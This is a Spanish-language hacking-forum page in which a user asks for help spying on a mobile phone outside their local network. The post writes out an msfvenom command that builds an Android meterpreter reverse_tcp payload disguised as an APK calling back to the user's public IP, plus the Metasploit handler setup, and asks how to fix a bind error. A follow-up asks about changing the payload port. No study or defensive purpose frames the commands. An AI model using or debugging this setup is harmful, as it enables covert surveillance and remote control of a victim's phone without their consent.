elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Curso de javascript por TickTack


  Mostrar Mensajes
Páginas: [1]
1  Seguridad Informática / Bugs y Exploits / Re: respuesta en: 1 Octubre 2017, 01:44 am
gracias amigo, ya funcionó.
ahora tengo que cambiar el puerto del payload verdad?


· No se debe escribir en mayúsculas
>aquí las reglas del foro
-Engel Lex




Como lo solucionaste por que tengo el mismo problema
2  Seguridad Informática / Bugs y Exploits / Necesito ayuda porfa favor en: 1 Octubre 2017, 00:11 am
Hola miren mi problema es el siguiente quiero espiar un celular fuera de mi red local y ise todos los pasos que e visto en Youtube y páginas de poner msfvenom  -p  Android/meterpreter/reverse_tcp LHOST= ( aquí pongo la IP pública y también e intentado con poner el hostname de noip) LPORT=4444  -0  (nombre de la aplicacion).apk

Y luego de eso me voy a metasploit y pongo el tipo comando de msfcosole luego use exploit/multi/handler luego set PAYLOAD Android/meterpreter/reverse_tcp luego set LHOST ( la ip privada pongo ) luego set LPORT 4444 y Al momento de poner exploit e instalar la aplicación me sale este error

Explot running as background Job 1

Handler failed to bind to 192.168.1.33:4444
Handler failed to bind to 0.0.0.0:4444:
Exploit failed [ bad config ]: Rex::BindFailed The address unavailable: 8.0.0.0:4444

Alguien sabe como solucionar ese error porfa PDT ya lo intente hacer poniendo la IP pública y el hostname de no IP y cambiando el puerto y si se preguntan si abrí los puerto si si lo ise
 
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines